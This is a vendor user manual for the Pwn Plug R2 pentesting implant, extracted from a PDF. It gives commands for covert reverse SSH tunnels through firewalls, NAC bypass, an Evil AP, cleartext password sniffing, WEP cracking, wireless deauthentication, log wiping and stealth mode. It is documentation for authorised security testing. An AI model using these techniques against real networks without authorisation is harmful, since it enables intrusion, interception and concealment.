Home

Pwn Plug R2 User Manual

image

Contents

1. enter a new IP address network mask default gateway and primary DNS server and click Apply static IP settings Note After the device s IP address is changed reconnect to the UI using the newly assigned IP address To set ethO to acquire network settings from a DHCP server instead recommended click Enable on the DHCP Tab Note After switching to DHCP you ll need to access the device via the virtual default interface 192 168 9 10 or via local serial console to determine the new IP address assigned by DHCP Once the new DHCP assigned IP address is known reconnect to the UI using the newly assigned IP address To change the ethO interface MAC address enter a new MAC and click Change MAC Note that the ethO MAC address will always revert back to the hardware default after a reboot Tip The virtual default interface 192 168 9 10 can be shut down by running the following at the SSH or serial console command line ifdown etho 1 Reverse Shell Key 1 Click Setup on the top menu Copyright 2013 Pwnie Express All rights reserved 6 Click Reverse Shell Key This section shows the current root user SSH key used to establish the reverse shells Optional To generate a new key pair for the reverse shells click Generate Tip If a key pair doesn t already exist a new one will be automated generated after enabling one or more reverse shells on the Reverse Shells page C
2. Bus 003 Device 003 ID 12d1 1506 Huawei Technologies Co Ltd E398 LTE UMTS GSM Modem Networkcard To query the GSM modem for adapter details gsmctl d dev ttyUSBO me Note If the command returns SIM failure the SIM card is either missing or not inserted properly Tip If the modem does not respond on dev ttyUSBO after 10 seconds try dev ttyUSB1 dev ttyUSB2 or dev ttyUSB3 To list cellular operators in range gsmctl d dev ttyUSBO op To show currently attached operator gsmctl d dev ttyUSBO currop To show signal strength of current operator connection gsmctl d dev ttyUSBO sig Copyright 2013 Pwnie Express All rights reserved 19 11 To check PIN status READY No PIN set gsmctl d dev ttyUSBO pin 12 To send a text message gsmsendsms d dev ttyUSBO destination 11 digit cell number Test 13 To make an outbound phone call gsmctl d dev ttyUSBO o dial 11 digit phone number Connecting to the Internet via 3G 1 Call the appropriate pppd dialup script For the unlocked GSM adapter pppd nodetach call e160 amp For the Verizon Virgin Mobile adapters pppd nodetach call lxevdo amp For the T mobile Rocket 4G adapter pppd nodetach call tmobile amp 2 Assuming a 3G cellular data signal is available the adapter will establish an Internet connection within 10 20 seconds Once connected you will see a solid LED on the top of the adapter 3 Optional Reset the defaul
3. Evil AP interface and SSID can customized in opt pwnix pwnix config services evil_ap conf Reverse Shells page See section Using the reverse shells for details on this feature System Details page This section displays the device s software release level system logs disk usage etc Help page This section covers basic UI interface usage This user guide is more thorough Using the reverse shells Reverse shell overview All Pwnie devices include aggressive reverse tunneling capabilities for persistent remote SSH access SSH over HTTP HTTPS SSL DNS ICMP and other covert tunneling options are available for traversing strict firewall rules web filters amp application aware IPS All tunnels are encrypted via SSH and will maintain access wherever the device has an Internet connection including wired wireless and 4G GSM where available Typical deployment scenario Copyright 2013 Pwnie Express All rights reserved 9 1 Ona staging lab network enable the desired reverse shells see Activating the reverse shells 2 Configure a Backtrack 5 system to receive the reverse shells see Configuring Backtrack to receive the reverse shells 3 Test the reverse shells in a lab local LAN to confirm all shells are working as expected see Connecting to the reverse shells 4 Optional Enable Stealth Mode see Using the Pwnix UI 5 Deploy the device to your target network and watch your SS
4. Example 15360 948161 usb 5 3 FTDI USB Serial Device converter now attached to ttyUSBO If the serial interface is showing up as something other than ttyUSBO such as ttyUSB1 adjust the screen command accordingly 3 Press ENTER twice Tip If a login command prompt does not appear or if you see a line of question marks or strange looking characters try pressing CTRL C several times or disconnecting reconnecting the mini USB serial cable 4 At the login prompt login with the pwnie user account default login is pwnie pwnplug8000 Tip To exit a screen session press CTRL A then backslash then Y Copyright 2013 Pwnie Express All rights reserved 27 Reviewing the Pwnix environment Show device software revision grep Release etc motd Show kernel version uname r Show date time date Show filesystem disk usage note your disk usage may vary df h Show CPU details cat proc cpuinfo Show total memory grep MemTotal proc meminfo Show current ethO config ifconfig ethO Show currently listening TCP UDP services note dhclient won t be present if not using DHCP netstat Intup Check syslog for errors warnings etc egrep i warn fail crit error bad unable var log messages Show Ruby version ruby v Show Perl version perl v Copyright 2013 Pwnie Express All rights reserved 28 Show Python version python V How to get support Pwnie
5. Express Support Portal http www pwnieexpress com pages support Pwnie Express Community Support Forum http forum pwnieexpress com Copyright 2013 Pwnie Express All rights reserved 29
6. 2 2 On your Pwnie device VPN server opt pwnix pwnix scripts Enable_ SSH_VPN sh w The SSH VPN tunnel should now be active 4 On Backtrack test connectivity to target network through the VPN tunnel ping 10 1 1 2 ping 172 16 1 1 or any remote machine on the target network nmap sP 172 16 1 5 To disable the VPN tunnel on the Backtrack side ifconfig tunO down 6 To disable the VPN tunnel on your Pwnie device opt pwnix pwnix scripts Disable_ SSH_VPN sh Using the wireless hardware 802 11 wireless Connecting to an open wifi network 1 Set the wireless interface to managed mode iwconfig wlanO mode managed 2 Bring up the interface ifconfig wlanO up 3 Scan for access points in the area iwlist scan Copyright 2013 Pwnie Express All rights reserved 15 4 6 Associate with an access point with SSID example on channel 6 iwconfig wlanO essid example iwconfig wlanO channel 6 Restart the interface ifconfig wlanO down ifconfig wlanO up Acquire a DHCP address dhclient wlanO Running Airodump ng amp Kismet 1 Bring down the interface ifconfig wlanO down To launch airodump ng airodump ng wianO Note The output of airodump ng will only display properly within an SSH session running airodump ng from the serial console is not recommended When finished press CTRL C to exit To launch Kismet kismet Press ENTER 3 time
7. FANIE CA FTE gt Copyright 2013 Pwnie Express All rights reserved Manual revision 07 23 2013 Pwn Plug R2 User Manual Note The online version of this manual is maintained here http www pwnieexpress com pages documentation Table of Contents Introduction Core features Hardware specs Legal disclaimers Getting started Using the Pwnix_UI Accessing Pwnix UI Setup page System Authentication Network Config Reverse Shell Key Clean up History and Logs Update Device Restart Device Services page Passive Recon Evil AP Reverse Shells page System Details page Help page Using the reverse shells Reverse shell overview Typical deployment scenario Activating the reverse shells Configuring Backtrack to receive the reverse shells Connecting to the reverse shells Deploying to target network Using SSH port forwarders on Backtrack Example 1 Connecting to remote RDP servers Example 2 Connecting to remote web servers Creating an SSH VPN Sample environment Activating the SSH VPN tunnel Using the wireless hardware Copyright 2013 Pwnie Express All rights reserved 1 802 11 wireless Connecting to an open wifi network Running Airodump ng amp Kismet Packet injection amp WEP cracking Wireless client de authentication Bluetooth Using the Bluetooth adapter 4G GSM cellular Using the unlocked GSM adapter Connecting to the Internet via 3G Using the SSH over 3G shell Accessing the p
8. FSEULA pdf Open source software is distributed under one or more of the following licenses GNU PUBLIC LICENSE HTTP WWW GNU ORG LICENSES GPL HTML BSD 3 CLAUSE LICENSE HTTP WWW OPENSOURCE ORG LICENSES BSD 3 CLAUSE OPENSSL TOOLKIT DUAL LICENSE HTTP WWW OPENSSL ORG SOURCE LICENSE HTML APACHE LICENSE VERSION 2 0 HTTP WWW APACHE ORG LICENSES LICENSE 2 0 HTML OO0O0 As with any software application any downloads transfers of this software are subject to export controls under the U S Commerce Department s Export Administration Regulations EAR By using this software you certify your complete understanding of and compliance with these regulations Getting started Connect the provided wireless antenna to the SMA jack on the side of the device Connect the onboard Ethernet jack to a local network or switch Connect the AC adapter to a power source The device will power on automatically The default device IP address is 192 168 9 10 netmask 255 255 255 0 To access the device for the first time configure your Linux Mac Windows system with the following IP settings IP address 192 168 9 11 Netmask 255 255 255 0 Tip On Linux hosts you can configure a virtual interface as shown ifconfig ethO 1 192 168 9 11 24 Confirm connectivity to the device by pinging it ping 192 168 9 10 You can now access the device through the Pwnix UI Proceed to Using the Pwnix UI below Tip You can now also connect to t
9. H receiver for incoming shells see Deploying to target network 1 4 H Pwn Plug on target network Firewall on target network SSH Receiver Backtrack Activating the reverse shells a Log into the Pwnix Ul Click Reverse Shells on the top menu Select the name of the shell you wish to configure Tip To best maintain persistent remote access enable all of the reverse shells Enter the SSH shell receiver IP address or DNS name for each selected reverse shell The device will connect to this shell receiver system to establish the reverse shell connections Choose how often the reverse shell connection should be attempted By default a shell connection will be attempted every minute recommended Note To use an HTTP proxy for the SSH over HTTP Tunnel enable the Use HTTP Proxy checkbox and enter the proxy server address and port and optionally proxy server credentials Note The HTTP proxy auth password is stored in clear text in opt pwnix pwnix scripts script_configs Click Configure at the bottom of each form to apply your changes Note The following SSH client config directives etc ssh ssh_config are set on all devices to allow for automation of reverse shell connections Be sure you understand the security implications of these settings before connecting to other SSH servers from the device StrictHostKeyChecking no UserKnownHostsFile dev null Copyright 2013 Pwnie Express All righ
10. P address and default gateway To avoid tripping the switch s port security the device then establishes a reverse SSH connection using the MAC and IP address of the already authenticated client PC Once connected to the device s SSH console you will have access to any internal subnets accessible by the client PC Tip Since NAC bypass mode effectively turns the device into a transparent bridge it can be used even where NAC 802 1x controls are not present on the target network lt 2 r etho M gt eth Wall jack or switch Pwn Plug Client PC Enabling NAC Bypass mode Important Enabling NAC Bypass mode will prevent direct access to your Pwnie device s SSH server and Pwnix UI over the network Once stealth mode is enabled access to the device can only be obtained through a reverse shell or the local serial console Note These steps must be followed in the exact sequence shown to avoid tripping switch port security which often completely disables the switch port and may alert network personnel 1 2 Setup your desired reverse shells see Using the reverse shells Login to your device via SSH and run the following command service pwnix_nac_bypass start Poweroff the device At next boot the device will be in NAC bypass mode Note After rebooting you will no longer be able to directly connect to the device via the Pwnix UI or SSH Deploy the device to your target environment as follows O Connect the devic
11. TP requests var log pwnix passive_recon http log OS guesses var log pwnix passive_recon pOf log Clear text passwords var log pwnix passive_recon dsniff log Tip Passive Recon is most effective when the Pwnie device is in NAC Bypass transparent bridging mode or when connected to a switch monitor SPAN port or network tap Tip The Passive recon service can also be enabled disabled from the command line as follows To enable service pwnix_passive_recon start update rc d pwnix_passive_recon defaults To disable service pwnix_passive_recon stop update rc d f pwnix_passive_recon remove Evil AP oRWNER Ensure the wireless antenna is connected to the device Click Services on the top menu Click Evil AP Click Start Service Wireless clients will begin connecting to the AP either automatically via preferred network lists or by direct AP association Tip To view realtime Evil AP activity from the command line tail f var log pwnix evilap log By default the device will function as a standard AP transparently routing all client Internet requests through the wired interface eth0O Tip The Evil AP service can also be enabled disabled from the command line as follows To enable service pwnix_evil_ap start update rc d pwnix_evil_ap defaults Copyright 2013 Pwnie Express All rights reserved 8 To disable service pwnix_evil_ap stop update rc d f pwnix_evil_ap remove Tip The
12. configure it to use localhost as an HTTP proxy on port 8080 You can now connect to any web server on the remote network by entering the IP address or URL into Firefox Creating an SSH VPN OpenSSH server supports SSH based VPN tunnelling through any active reverse shell allowing transparent albeit slow access to your target network from your Backtrack machine This is mainly useful when the need arises for a GUl based or third party pentesting tool such as BurpSuite Nessus Remote Desktop client etc Sample environment The steps below assumes the following IP addresses ranges Substitute the addresses ranges for your target and local Backtrack networks where appropriate Target network where the device is deployed 172 16 1 0 24 Local network where Backtrack SSH receiver is located 192 168 1 0 24 VPN network 10 1 1 0 30 Backtrack VPN address tun0 interface 10 1 1 1 Pwnie device VPN address tunO interface 10 1 1 2 Assumes a reverse shell is currently established and listening on localhost 3333 Standard Reverse SSH Any active reverse shell can be used to carry the VPN tunnel change 3333 where appropriate Activating the SSH VPN tunnel 1 On Backtrack VPN client ssh f w 0 0 localhost p 3333 true Login to the device as root when prompted Copyright 2013 Pwnie Express All rights reserved 14 ifconfig tunO 10 1 1 1 10 1 1 2 netmask 255 255 255 252 route add net 172 16 1 0 24 gw 10 1 1
13. e On the Backtrack SSH receiver watch for the inbound SSH over 3G connection watch d netstat Intup4 grep 3337 Once the connection appears connect to your Pwnie device as shown ssh pwnie localhost p 3337 Enter your Pwnie device SSH user password and voila You re now remotely connected to the device through the reverse shell over 3G Note The 3G connection will be released and reconnected at the selected retry interval until a reverse SSH tunnel is established Accessing the pentesting tools Accessing Metasploit Copyright 2013 Pwnie Express All rights reserved 21 The Metasploit binaries msfconsole msfcli etc can be run from any directory Simply type msfconsole to launch the local Metasploit Console Accessing Metasploit via msfrpcd The msfrpcd service can be customized by editing the file opt pwnix pwnix config services msfprcd conf nano opt pwnix pwnix config services msfrpcd conf To restart the msfrpcd service service pwnix_msfrpc restart To access the msfrpcd service from a remote host you will need a front end application We suggest using Backtrack for this Log into Backtrack with your credentials and run the following from the commandline startx cd opt metasploit diagnostic_shell msf3 msfgui Login to msfgui using the credentials specific in opt pwnix pwnix config services msfprcd conf Note You may have to open msfgui more than once to get it to
14. e to a power outlet O Wait at least 30 seconds for the device to fully boot into NAC bypass mode Copyright 2013 Pwnie Express All rights reserved 24 O Disconnect the client PC s Ethernet cable from the wall jack O Connect the device s primary Ethernet port ethO to the Ethernet wall jack Note eth0 is the right most Ethernet jack on the rear of the unit O Immediately connect the Ethernet over USB adapter eth1 to the client PC Note eth1 is the left most Ethernet jack on the rear of the unit 6 The client completes its normal 802 1x authentication process transparently through the device 7 When the first outbound HTTP port 80 packet leaves the client PC the reverse shell connection schedule will re initiate automatically NAC Bypass troubleshooting 1 Log into the device s serial console see Accessing the local serial console 2 Confirm all outbound packets are tagged with the client PC s MAC and IP address tcpdump nnei ethO 4 Confirm 802 1x EAPOL authentication packets are being forwarded by the bridge On the Windows client PC Start the Wired Autoconfig service Open the LAN connection properties Authentication tab Open PEAP settings Uncheck the Validate server certificate checkbox and click OK Click the Additional settings button Check specify authentication mode Select user authentication from the drop down box Click the Replace credentials button userna
15. entesting tools Accessing Metasploit Accessing Metasploit via msfrpcd Running additional pentesting tools Pentesting Resources Using advanced features NAC 802 1x Bypass NAC Bypass overview Enabling NAC Bypass mode NAC Bypass troubleshooting Disabling NAC Bypass mode Stealth Mode Maintaining your Pwnie device Updating the Pwnix software Accessing the local serial console Reviewing the Pwnix environment How to get support Copyright 2013 Pwnie Express All rights reserved 2 Introduction Introducing the Pwn Plug R2 a tightly integrated penetration testing platform in a portable shippable plug and pwn form factor With onboard high gain wireless and dual Ethernet external high gain Bluetooth 4G GSM cellular more storage and many software improvements the Pwn Plug R2 is the enterprise pentester s dream tool Core features Onboard high gain 802 11b g n wireless supporting packet injection Onboard dual Gigabit Ethernet for NAC bypass amp network monitoring External high gain Bluetooth adapter up to 1000 supporting packet injection External unlocked 4G GSM cellular adapter SIM card not included Automated wired NAC 802 1x RADIUS bypass Simple web based administration and in product updates with Pwnix UI One click Evil AP amp Passive Recon services Maintains persistent reverse SSH access to your target network Uses 6 different covert channels to tunnel through application awa
16. ess or DNS name if available 2 Optional Enable Stealth Mode 3 You can now deploy the device to your target network The device will automatically phone home to your shell receiver system providing encrypted remote access to your target network Tip In some environments you may wish to schedule a nightly reboot of the device to re initiate all connections from the device side This way if some part of the connection process crashes on the device side for example sshd the connection process will start fresh again after the reboot Using SSH port forwarders on Backtrack Example 1 Connecting to remote RDP servers 1 On Backtrack ssh pwnie localhost p XXXX NL 3389 xXxx xxx xxx xxx 3389 where XXXxX is the local listening port of an active reverse shell Such as 3333 for standard reverse SSH and where Xxx xxx xxx xxx is the IP address of an RDP target system on the remote network your Pwnie device is physically connected to 2 Login to the device when prompted 3 Connect to the remote RDP server through the SSH tunnel by using localhost rdesktop localhost Copyright 2013 Pwnie Express All rights reserved 13 Example 2 Connecting to remote web servers wo On Backtrack ssh pwnie localhost p XXXX ND 8080 where XXXxX is the local listening port of an active reverse shell Such as 3333 for standard reverse SSH Login to your Pwnie device when prompted Open Firefox and
17. he device via SSH default login pwnie pwnplug8000 From a Linux Mac host run the following command For Windows users we recommend the PuTTY SSH client ssh pwnie 192 168 9 10 Copyright 2013 Pwnie Express All rights reserved 4 Note The pwnie system account is a standard user with sudo privileges Most of the system commands and pentesting tools referenced in this manual must be run as root as indicated by a hash tag proceeding the command Once logged in as pwnie you can sudo to root as follows sudo su Using the Pwnix UI Accessing Pwnix UI w Open a web browser and access the UI https device_ip_address 1443 Tip If accessing for the first time the default URL is https 192 168 9 10 1443 The UI is SSL enabled but you will receive a warning as the certificate is self signed At the login prompt enter your username password default is pwnie pwnplug8000 The Setup page appears Important We recommend changing the default pwnie user password as soon as possible Proceed to System Authentication below Setup page System Authentication D Click Setup on the top menu Click System Authentication Enter a new password for the pwnie user into both fields and click Change password Note This will change the password for the pwnie UI user and the pwnie system Linux SSH account Pwnix UI authentication is integrated with Linux PAM al
18. l bands HSDPA GSM UMTS EDGE GPRS and is compatible with AT amp T T mobile Vodafone Orange and GSM carriers in over 160 countries Copyright 2013 Pwnie Express All rights reserved 18 vi 10 GSM carriers in the Americas http en wikipedia org wiki List_of_ mobile network operators of the Americas GSM carriers in Europe http en wikipedia org wiki List_of mobile network operators of Europe Note Verizon Sprint Virgin Mobile and other CDMA carrier SIMs will not work in the unlocked GSM adapter First obtain a SIM card from the GSM cell provider of your choice In the US SIM cards from AT amp T and T mobile devices including iPhones are supported Note The mobile service attached to the SIM card must have mobile broadband data service Verify you can access the Internet from your phone using the SIM card before proceeding Slide open the the plastic cover on the GSM adapter Insert your SIM card into the adapter with the notch positioned as shown by the line drawing on the SIM slot with the SIM card contacts facing down Note Many GSM phones including the iPhone4 use a micro SIM instead of a standard sized SIM card To fit these SIM cards into the GSM adapter use the included micro SIM card adapter Slide the plastic cover back onto the adapter Connect the GSM adapter to the device s USB port Confirm the GSM adapter is detected properly note adapter detection may take 15 20 seconds Isusb
19. lean up History and Logs Y Click Setup on the top menu Under Clean up Pwnix History and Logs click the Cleanup now button This clears the root user s bash history UI logs and all logs in var log Note The bash history for any currently active root user sessions will be cleared at next logout Tip The cleanup script can also be invoked from the command line as follows opt pwnix pwnix scripts cleanup sh Update Device Click Setup on the top menu Under Update Device click the Update Now button Note The device must have Internet access via ports 80 and 443 for the update to succeed The latest stable Pwnix release is downloaded and applied typically 3 5 minutes You will be redirected to the update log The current Pwnix version can be viewed under the System Details tab The Pwnix Update log can be view under the System Details tab Restart Device 1 2 3 Click Setup on the top menu Under Restart Device click the Reboot Now button The device will reboot immediately Services page Copyright 2013 Pwnie Express All rights reserved 7 Passive Recon Pte Ne Click Services on the top menu Click Passive Recon Click Enable to start the passive recon service While enabled the device will passively listen on ethO recording HTTP requests user agents cookies OS guesses and clear text passwords to the following logs HT
20. lowing the UI and system passwords to be synced for the pwnie user Click Logout on the top menu to re authenticate with your new credentials Tip You can also set the pwnie user s password via the command line as shown passwd pwnie Please note that if you change the password from the command line it will change the Pwnix UI password as well Copyright 2013 Pwnie Express All rights reserved 5 Network Config 1 Click Setup on the top menu Click Network Config The device s onboard network interfaces are displayed under Current Network Settings wN By default the Pwn Plug R2 ships with the following interfaces ethO The right most Ethernet jack on the rear of the unit configured for DHCP by default eth0 1 The virtual default interface for initial access 192 168 9 10 24 by default eth1 The right most Ethernet jack on the rear of the unit wlanO The onboard 802 11 wireless adapter DOWN by default gt To change the device s host name enter a new host name and click Change hostname Tip After changing the hostname log out of any active terminal sessions to update your terminal prompt 5 To configure NTP Servers enter 3 7 NTP Servers and click Configure NTP 6 To change the IP configuration for ethO click the Configure link in the adapter table e ethO is configured for DHCP by default To set a static IP for ethO Select Static Config
21. me testuser password testpasswd Click OK then OK again to close network connection setup To generate EAPOL packets restart the Wired Autoconfig service cr vrserpeaooy On the Pwn Plug a tcpdump nnei ethO egrep EAPOL b Look for outbound EAPOL packets Example 15 38 54 333292 00 0c 29 5c 74 41 gt 01 80 c2 00 00 03 ethertype EAPOL 0x888e length 60 EAPOL start Tip To manually force a link refresh from the command line mii tool r ethO mii tool r eth1 Disabling NAC Bypass mode Copyright 2013 Pwnie Express All rights reserved 25 1 Log into the device through a reverse shell or the serial console see Accessing the serial console 2 Run the following command service pwnix_nac_bypass stop 3 Reboot Stealth Mode When enabled stealth mode does the following Disables IPv6 support prevents noisy IPv6 broadcasting Disables ICMP replies won t respond to ping requests Disables the UI closes port 1443 Sets the local SSH server to listen on the loopback address only closes port 22 to the outside Still allows all reverse shells to function as expected Important Enabling stealth mode will prevent direct access to your Pwnie device s SSH server and Pwnix UI over the network Once stealth mode is enabled access to the device can only be obtained through a reverse shell or the local serial console To enable Stealth Mode run the following commands update rc d pwnix_stealth defa
22. p ng bssid MAC of target AP c 6 wlanO 3 Then in a second terminal start the client de authentication aireplay ng 0 O a MAC of target AP c MAC of target client wianO Bluetooth Using the Bluetooth adapter 1 Connect the SENA UD100 Bluetooth USB adapter to the device 2 Confirm the output of the following commands Copyright 2013 Pwnie Express All rights reserved 17 Isusb Bus 001 Device 002 ID 0a12 0001 Cambridge Silicon Radio Ltd Bluetooth Dongle HCI mode hciconfig hcil hcil Type BR EDR Bus USB BD Address XX XX XX XX XX XX ACL MTU 310 10 SCO MTU 64 8 DOWN RX bytes 466 acl 0 sco 0 events 18 errors 0 TX bytes 73 acl 0 sco 0 commands 17 errors 0 Enable the Bluetooth interface and set it to Non Discoverable hciconfig hcil up hciconfig hcil noscan To scan for remote Bluetooth devices hcitool i hcil scan flush info class To ping the address of a remote Bluetooth device I2ping i hcil XX XX XX XX XX XX To dump Bluetooth packets hcidump i hcil t X To pair with a remote Bluetooth device bluez simple agent hcil XX XX XX XX XX XX IMPORTANT Before disconnecting the USB Bluetooth adapter always set the interface to a DOWN state first by running the command below Disconnecting the adapter while the interface is UP may cause a system crash hciconfig hcil down 4GIGSM cellular Using the unlocked GSM adapter The unlocked GSM adapter supports five GSM cel
23. prompt you for a server By default it starts an msfrpcd instance on the local Backtrack system Running additional pentesting tools Thanks to the rock stars at the Kali Linux project kali org all below pentesting tools are pre installed as Debian packages and can be run from any path on the system e T e Copyright 2013 Pwnie Express All rights reserved 22 aeaoe sh a a 2 a e e a 2 C e a Pentesting Resources e PTES http www pentest standard org index php PTES_Technical_Guidelines e Analysis of Metasploit relative to PTES http www tinyurl com msf ptes e Metasploit Unleashed Using advanced features NAC 802 1x Bypass NAC Bypass overview This device can bypass most wired NAC 802 1x RADIUS implementations providing a reverse shell backdoor and full connectivity to NAC restricted networks Special thanks to Skip Duckwall and his 802 1x bridging research _http 8021xbridge googlecode com Here s how it works Copyright 2013 Pwnie Express All rights reserved 23 First the device is placed in line between an 802 1x enabled client PC and a wall jack or switch Using a modified layer 2 bridging module the device transparently passes the 802 1x EAPOL authentication packets between the client PC and the switch Once the 802 1x authentication completes the switch grants connectivity to the network The first outbound port 80 packet to leave the client PC provides the device with the PC s MAC I
24. re firewalls amp IPS Supports HTTP proxies SSH VPN amp OpenVPN Out of band SSH access over 4G GSM cell networks Runs Pwnix a custom Debian distro based on Kali Linux kali org OSS based pentesting toolkit includes Metasploit SET Kismet Aircrack NG SSLstrip nmap Hydra w3af Scapy Ettercap Bluetooth VoIP IPv6 tools amp many more Unpingable and no listening ports in stealth mode Hardware specs Processor RAM 1 2GHz Armada 370 CPU 1GB DDR3 Disk storage 32GB microSDHC Class 10 Onboard wireless High gain 802 11b g n packet injection amp monitor mode 8 external antenna Onboard I O 2x Gigabit Ethernet 2x USB 3 0 serial console microSD slot External high gain Bluetooth adapter up to 1000 range supporting packet injection amp monitor mode Optional support for Zigbee Zwave RFID and Software Defined Radios SDR Voltage 110 240v Adapters available Power draw 5 watts idle 15 watts max Dimensions 5 2 x 3 7 x 0 8 Legal disclaimers Copyright 2013 Pwnie Express All rights reserved 3 All Rapid Focus Security Inc DBA Pwnie Express products are for legally authorized uses only By using this product you agree to the terms of the Rapid Focus Security EULA http ownieexpress com pdfs RFSEULA pdf This product contains both open source and proprietary software Proprietary software is distributed under the terms of the Rapid Focus Security EULA http ownieexpress com pdfs R
25. s then TAB then ENTER When finished press CTRL C to exit Tip Certain wireless tools may leave the wireless adapter in a mode that s not compatible with other wireless tools It s generally recommended to set the interface to a down state before running most wireless tools ifconfig wlanO down Packet injection amp WEP cracking 1 To run a simple packet injection test execute the following commands This example assumes a WEP enabled access point on channel 6 with SSID example is within range of the device Copyright 2013 Pwnie Express All rights reserved 16 ifconfig wlanO up iwconfig wlanO channel 6 ifconfig wlanO down aireplay ng e example test wlanO 2 Look for the following output 17 19 45 Waiting for beacon frame ESSID example on channel 6 Found BSSID 00 13 10 9E 52 3D to given ESSID example 17 19 45 Trying broadcast probe requests 17 19 45 Injection is working 17 19 46 Found 1 AP 3 To auto crack all WEP enabled access points on channel 6 using wepbuster ifconfig wlanO down wepbuster 6 Tip WEP cracking performance is dependant on the amount of wireless client traffic being generated on the target wifi network The more traffic on the wireless network the faster the cracking process Wireless client de authentication 1 This example assumes the target access point is on channel 6 iwconfig wlanO channel 6 2 In one terminal start airodump ng airodum
26. ss ENTER to watch for incoming device connections Each reverse shell will attempt to connect using the interval you specified in the UI Tip You can list all active device connections at any time by typing netstat Intup4 grep 333 Proceed to Connecting to the reverse shells Connecting to the reverse shells Copyright 2013 Pwnie Express All rights reserved 11 1 Open a terminal window on your shell receiver system and connect to any available listening Pwnie device shell as follows Standard SSH ssh pwnie localhost p 3333 SSH Egress Buster ssh pwnie localhost p 3334 SSH over DNS ssh pwnie localhost p 3335 SSH over SSL ssh pwnie localhost p 3336 SSH over 4G GSM ssh pwnie localhost p 3337 SSH over HTTP ssh pwnie localhost p 3338 SSH over ICMP ssh pwnie localhost p 3339 o 0 O0 O 0 0 0 1 Enter your plug s pwnie SSH user password and voila You re now remotely connected to the device through the reverse shell 2 Proceed to Deploying to target network Standard SSH SSH Egress Buster Note If there s no firewall between the plug and your shell receiver system be sure the shell receiver system SSH server is listening on the ports you selected for the Standard Reverse SSH and SSH Egress Buster shells in the UI For example if you set port 31337 for Standard Reverse SSH add the line Port 31337 to etc ssh sshd_config then restart SSHd etc init d ssh restart Tip The SSH recei
27. t route to use the 3G interface pppO route del default route add default pppO 4 Test 3G Internet connectivity ping google com traceroute google com 5 To close the 3G connection and restore Internet connectivity on ethoO killall s SIGHUP pppd ifdown ethO amp amp ifup ethoO Copyright 2013 Pwnie Express All rights reserved 20 Using the SSH over 3G shell The SSH over 3G reverse shell provides secure out of band access to your Pwnie device wherever a 3G cellular data signal is available While this bypasses your target network s perimeter a reverse shell is still recommended many cell carriers do not assign public IP addresses to 3G data access devices Pwn Plug on target network e ONOARWHN 10 SSH receiver Backtrack 3G pal nN _ 7 f Firewall in front of SSH receiver If you haven t done so already complete the reverse shell setup steps see Activating the reverse shells and Configuring the SSH receiver In the Reverse Shells page in UI enable the SSH over 3G GSM shell Configure the shell to connect to your firewall s public IP address or DNS name if available Enter the destination port you d like the Pwnie device to use for the SSH connection Select your 3G adapter from the drop down list Click the Configure all shells button Configure your firewall to forward the port selected in the UI to port 22 on your Backtrack machin
28. ts reserved 10 7 Proceed to configure your shell receiver Configuring Backtrack to receive the reverse shells A Backtrack 5 system Backtrack 5 R3 recommended can serve as the SSH tunnel receiver The Pwn Plug will connect to this system when initiating the reverse shell connections Note These steps assume you re using Backtrack 5 R3 as your SSH receiver Older Backtrack distributions may be used but different steps may apply Oy OTe Dae gt 11 12 13 Place your Pwnie device and the Backtrack system on the same local network subnet Login to the Backtrack system and open Firefox Connect to the UI https device_ip_address 1443 Login to the UI when prompted Click Reverse Shells on the top menu Click the Generate Backtrack config link at the top of the page under step 5 to download the backtrack_receiver sh script Save the script file backtrack_receiver sh into the root user s home directory selected by default Open a terminal window and enter the following commands cd chmod x backtrack_receiver sh backtrack_receiver sh The script auto configures and starts the reverse shell listeners on Backtrack When prompted enter the desired certificate information for the stunnel SSL certificate or just press ENTER to accept the defaults Once the auto config script completes you will see Setup Complete Press ENTER to listen for incoming connections Pre
29. ults service pwnix_stealth start To disable Stealth Mode service pwnix_stealth stop update rc d f pwnix_stealth remove Tip For additional stealthiness run the following commands If using DHCP kill the dhclient process closes listening UDP port 68 killall dhclient Randomize your MAC address macchanger r ethO Disable ARP replies careful this may affect network connectivity ifconfig ethO arp Copyright 2013 Pwnie Express All rights reserved 26 Maintaining your Pwnie device Updating the Pwnix software To update the Pwnix software platform to the latest release including security updates follow the steps shown in section Using the Pwnix Ul gt Setup page gt Update device Accessing the local serial console The serial console is useful for debugging or when a network connection is unavailable 1 Connect the supplied mini USB cable between the plug s mini USB serial port and a Linux machine On some older Linux kernels the following commands may be required modprobe usbserial modprobe ftdi_sio vendor 0x9e88 product 0x9eS8f Tip For Windows Mac systems see _http www plugcomputer org Documentation howtos serial terminal 2 Connect to the plug s serial console using screen note on some distros this must be run as root screen dev ttyUSBO 115200 Tip If screen terminates after a few seconds use dmesg to confirm the plug is showing up as a USB serial device
30. ver address can be anonymized using the Tor Hidden Service feature as described here http www securitygeneration com security reverse ssh over tor on the pwnie express Special thanks to Sebastien J of Security Generation for streamlining the SSH receiver setup process and to Lance Honer for his resilient autossh script improvements Deploying to target network Pwn Plug on SSH receiver target network Backtrack Firewall on Firewall in front target network of SSH receiver 1 Place your shell receiver system behind a public facing firewall 2 Configure the appropriate port forwarders on your firewall Copyright 2013 Pwnie Express All rights reserved 12 o Standard Reverse SSH Forward the port selected in the UI to port 22 of your shell receiver o SSH over HTTP Forward port 80 to port 80 of your shell receiver system o SSH over SSL Forward port 443 to port 443 of your shell receiver system o SSH over DNS Forward UDP port 53 to UDP port 53 of your shell receiver system o SSH over ICMP Requires your shell receiver system to be directly connected to the Internet no firewall o SSH over 3G Forward the port selected in the UI to port 22 of your shell receiver system o SSH Egress Buster Forward all ports selected in the UI to port 22 of your shell receiver system 1 In the Pwnix UI Reverse Shells page configure the reverse shells to connect to your firewall s public IP addr

Download Pdf Manuals

image

Related Search

Related Contents

NI USB-9234 User Guide and Specifications    amoladora angular recta cod. 79901  Bible du spectacle - Festival d`Automne à Paris  Franke Doric  Univex 21PT6441 User's Manual  Lake Shore Model 625 Superconducting Magnet Power Supply  Manuale di utilizzo  

Copyright © All rights reserved.
Failed to retrieve file